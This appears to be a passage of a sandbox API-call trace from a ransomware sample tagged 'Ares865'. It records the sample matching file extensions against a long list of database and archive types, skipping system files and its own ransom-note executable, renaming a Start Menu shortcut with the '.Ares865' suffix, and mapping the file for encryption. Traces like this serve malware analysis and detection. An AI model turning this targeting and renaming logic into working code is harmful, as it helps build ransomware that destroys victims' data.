[0058.676] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.676] lstrlenW (lpString="hdb") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.676] lstrlenW (lpString="his") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.676] lstrlenW (lpString="ib") returned 2 [0058.676] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.676] lstrlenW (lpString="idb") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.676] lstrlenW (lpString="ihx") returned 3 [0058.676] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.676] lstrlenW (lpString="itdb") returned 4 [0058.677] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.677] lstrlenW (lpString="itw") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.677] lstrlenW (lpString="jet") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.677] lstrlenW (lpString="jtx") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.677] lstrlenW (lpString="kdb") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.677] lstrlenW (lpString="kexi") returned 4 [0058.677] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.677] lstrlenW (lpString="kexic") returned 5 [0058.677] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0058.677] lstrlenW (lpString="kexis") returned 5 [0058.677] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0058.677] lstrlenW (lpString="lgc") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.677] lstrlenW (lpString="lwx") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.677] lstrlenW (lpString="maf") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.677] lstrlenW (lpString="maq") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.677] lstrlenW (lpString="mar") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.677] lstrlenW (lpString="marshal") returned 7 [0058.677] lstrcmpiW (lpString1="tor.lnk", lpString2="marshal") returned 1 [0058.677] lstrlenW (lpString="mas") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.677] lstrlenW (lpString="mav") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.677] lstrlenW (lpString="maw") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.677] lstrlenW (lpString="mdbhtml") returned 7 [0058.677] lstrcmpiW (lpString1="tor.lnk", lpString2="mdbhtml") returned 1 [0058.677] lstrlenW (lpString="mdn") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.677] lstrlenW (lpString="mdt") returned 3 [0058.677] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.678] lstrlenW (lpString="mfd") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.678] lstrlenW (lpString="mpd") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.678] lstrlenW (lpString="mrg") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.678] lstrlenW (lpString="mud") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.678] lstrlenW (lpString="mwb") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.678] lstrlenW (lpString="myd") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.678] lstrlenW (lpString="ndf") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.678] lstrlenW (lpString="nnt") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.678] lstrlenW (lpString="nrmlib") returned 6 [0058.678] lstrcmpiW (lpString1="or.lnk", lpString2="nrmlib") returned 1 [0058.678] lstrlenW (lpString="ns2") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.678] lstrlenW (lpString="ns3") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.678] lstrlenW (lpString="ns4") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.678] lstrlenW (lpString="nsf") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.678] lstrlenW (lpString="nv") returned 2 [0058.678] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.678] lstrlenW (lpString="nv2") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.678] lstrlenW (lpString="nwdb") returned 4 [0058.678] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.678] lstrlenW (lpString="nyf") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.678] lstrlenW (lpString="odb") returned 3 [0058.678] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.678] lstrlenW (lpString="odb") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.679] lstrlenW (lpString="oqy") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.679] lstrlenW (lpString="ora") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.679] lstrlenW (lpString="orx") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.679] lstrlenW (lpString="owc") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.679] lstrlenW (lpString="p96") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.679] lstrlenW (lpString="p97") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.679] lstrlenW (lpString="pan") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.679] lstrlenW (lpString="pdb") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.679] lstrlenW (lpString="pdm") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.679] lstrlenW (lpString="pnz") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.679] lstrlenW (lpString="qry") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.679] lstrlenW (lpString="qvd") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.679] lstrlenW (lpString="rbf") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.679] lstrlenW (lpString="rctd") returned 4 [0058.679] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.679] lstrlenW (lpString="rod") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.679] lstrlenW (lpString="rodx") returned 4 [0058.679] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.679] lstrlenW (lpString="rpd") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.679] lstrlenW (lpString="rsd") returned 3 [0058.679] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.679] lstrlenW (lpString="sas7bdat") returned 8 [0058.680] lstrcmpiW (lpString1="ator.lnk", lpString2="sas7bdat") returned -1 [0058.680] lstrlenW (lpString="sbf") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.680] lstrlenW (lpString="scx") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.680] lstrlenW (lpString="sdb") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.680] lstrlenW (lpString="sdc") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.680] lstrlenW (lpString="sdf") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.680] lstrlenW (lpString="sis") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.680] lstrlenW (lpString="spq") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.680] lstrlenW (lpString="te") returned 2 [0058.680] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.680] lstrlenW (lpString="teacher") returned 7 [0058.680] lstrcmpiW (lpString1="tor.lnk", lpString2="teacher") returned 1 [0058.680] lstrlenW (lpString="tmd") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.680] lstrlenW (lpString="tps") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.680] lstrlenW (lpString="trc") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.680] lstrlenW (lpString="trc") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.680] lstrlenW (lpString="trm") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.680] lstrlenW (lpString="udb") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.680] lstrlenW (lpString="udl") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.680] lstrlenW (lpString="usr") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.680] lstrlenW (lpString="v12") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.680] lstrlenW (lpString="vis") returned 3 [0058.680] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.681] lstrlenW (lpString="vpd") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.681] lstrlenW (lpString="vvv") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.681] lstrlenW (lpString="wdb") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.681] lstrlenW (lpString="wmdb") returned 4 [0058.681] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.681] lstrlenW (lpString="wrk") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.681] lstrlenW (lpString="xdb") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.681] lstrlenW (lpString="xld") returned 3 [0058.681] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.681] lstrlenW (lpString="xmlff") returned 5 [0058.681] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0058.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865") returned 88 [0058.681] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.ares865"), dwFlags=0x1) returned 1 [0058.682] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.682] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1262) returned 1 [0058.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.682] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.683] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x120 [0058.684] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0058.685] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.686] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.686] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.687] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.687] CloseHandle (hObject=0x120) returned 1 [0058.687] CloseHandle (hObject=0x15c) returned 1 [0058.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9f649f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="aoldtz.exe") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="..") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="windows") returned -1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="bootmgr") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="temp") returned -1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="pagefile.sys") returned -1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="boot") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ids.txt") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat") returned 1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="perflogs") returned -1 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="MSBuild") returned 1 [0058.689] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0058.689] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk") returned 80 [0058.689] lstrcpyW (in: lpString1=0x2cce488, lpString2="On-Screen Keyboard.lnk" | out: lpString1="On-Screen Keyboard.lnk") returned="On-Screen Keyboard.lnk" [0058.689] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0058.689] lstrlenW (lpString="Ares865") returned 7 [0058.689] lstrcmpiW (lpString1="ard.lnk", lpString2="Ares865") returned -1 [0058.689] lstrlenW (lpString=".dll") returned 4 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".dll") returned 1 [0058.689] lstrlenW (lpString=".lnk") returned 4 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".lnk") returned 1 [0058.689] lstrlenW (lpString=".ini") returned 4 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".ini") returned 1 [0058.689] lstrlenW (lpString=".sys") returned 4 [0058.689] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".sys") returned 1 [0058.689] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0058.689] lstrlenW (lpString="bak") returned 3 [0058.689] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.689] lstrlenW (lpString="ba_") returned 3 [0058.689] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.689] lstrlenW (lpString="dbb") returned 3 [0058.689] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.689] lstrlenW (lpString="vmdk") returned 4 [0058.689] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.690] lstrlenW (lpString="rar") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.690] lstrlenW (lpString="zip") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.690] lstrlenW (lpString="tgz") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.690] lstrlenW (lpString="vbox") returned 4 [0058.690] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.690] lstrlenW (lpString="vdi") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.690] lstrlenW (lpString="vhd") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.690] lstrlenW (lpString="vhdx") returned 4 [0058.690] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.690] lstrlenW (lpString="avhd") returned 4 [0058.690] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.690] lstrlenW (lpString="db") returned 2 [0058.690] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.690] lstrlenW (lpString="db2") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.690] lstrlenW (lpString="db3") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.690] lstrlenW (lpString="dbf") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.690] lstrlenW (lpString="mdf") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.690] lstrlenW (lpString="mdb") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.690] lstrlenW (lpString="sql") returned 3 [0058.690] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.690] lstrlenW (lpString="sqlite") returned 6 [0058.690] lstrcmpiW (lpString1="rd.lnk", lpString2="sqlite") returned -1 [0058.690] lstrlenW (lpString="sqlite3") returned 7 [0058.690] lstrcmpiW (lpString1="ard.lnk", lpString2="sqlite3") returned -1 [0058.690] lstrlenW (lpString="sqlitedb") returned 8 [0058.690] lstrcmpiW (lpString1="oard.lnk", lpString2="sqlitedb") returned -1 [0058.690] lstrlenW (lpString="xml") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.691] lstrlenW (lpString="$er") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.691] lstrlenW (lpString="4dd") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.691] lstrlenW (lpString="4dl") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.691] lstrlenW (lpString="^^^") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.691] lstrlenW (lpString="abs") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.691] lstrlenW (lpString="abx") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.691] lstrlenW (lpString="accdb") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accdb") returned 1 [0058.691] lstrlenW (lpString="accdc") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accdc") returned 1 [0058.691] lstrlenW (lpString="accde") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accde") returned 1 [0058.691] lstrlenW (lpString="accdr") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accdr") returned 1 [0058.691] lstrlenW (lpString="accdt") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accdt") returned 1 [0058.691] lstrlenW (lpString="accdw") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accdw") returned 1 [0058.691] lstrlenW (lpString="accft") returned 5 [0058.691] lstrcmpiW (lpString1="d.lnk", lpString2="accft") returned 1 [0058.691] lstrlenW (lpString="adb") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.691] lstrlenW (lpString="adb") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.691] lstrlenW (lpString="ade") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.691] lstrlenW (lpString="adf") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.691] lstrlenW (lpString="adn") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.691] lstrlenW (lpString="adp") returned 3 [0058.691] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.692] lstrlenW (lpString="alf") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.692] lstrlenW (lpString="ask") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.692] lstrlenW (lpString="btr") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.692] lstrlenW (lpString="cat") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.692] lstrlenW (lpString="cdb") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.692] lstrlenW (lpString="ckp") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.692] lstrlenW (lpString="cma") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.692] lstrlenW (lpString="cpd") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.692] lstrlenW (lpString="dacpac") returned 6 [0058.692] lstrcmpiW (lpString1="rd.lnk", lpString2="dacpac") returned 1 [0058.692] lstrlenW (lpString="dad") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.692] lstrlenW (lpString="dadiagrams") returned 10 [0058.692] lstrcmpiW (lpString1="yboard.lnk", lpString2="dadiagrams") returned 1 [0058.692] lstrlenW (lpString="daschema") returned 8 [0058.692] lstrcmpiW (lpString1="oard.lnk", lpString2="daschema") returned 1 [0058.692] lstrlenW (lpString="db-journal") returned 10 [0058.692] lstrcmpiW (lpString1="yboard.lnk", lpString2="db-journal") returned 1 [0058.692] lstrlenW (lpString="db-shm") returned 6 [0058.692] lstrcmpiW (lpString1="rd.lnk", lpString2="db-shm") returned 1 [0058.692] lstrlenW (lpString="db-wal") returned 6 [0058.692] lstrcmpiW (lpString1="rd.lnk", lpString2="db-wal") returned 1 [0058.692] lstrlenW (lpString="dbc") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.692] lstrlenW (lpString="dbs") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.692] lstrlenW (lpString="dbt") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.692] lstrlenW (lpString="dbv") returned 3 [0058.692] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.692] lstrlenW (lpString="dbx") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.693] lstrlenW (lpString="dcb") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.693] lstrlenW (lpString="dct") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.693] lstrlenW (lpString="dcx") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.693] lstrlenW (lpString="ddl") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.693] lstrlenW (lpString="dlis") returned 4 [0058.693] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.693] lstrlenW (lpString="dp1") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.693] lstrlenW (lpString="dqy") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.693] lstrlenW (lpString="dsk") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.693] lstrlenW (lpString="dsn") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.693] lstrlenW (lpString="dtsx") returned 4 [0058.693] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.693] lstrlenW (lpString="dxl") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.693] lstrlenW (lpString="eco") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.693] lstrlenW (lpString="ecx") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.693] lstrlenW (lpString="edb") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.693] lstrlenW (lpString="epim") returned 4 [0058.693] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.693] lstrlenW (lpString="fcd") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.693] lstrlenW (lpString="fdb") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.693] lstrlenW (lpString="fic") returned 3 [0058.693] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.693] lstrlenW (lpString="flexolibrary") returned 12 [0058.693] lstrcmpiW (lpString1="Keyboard.lnk", lpString2="flexolibrary") returned 1 [0058.693] lstrlenW 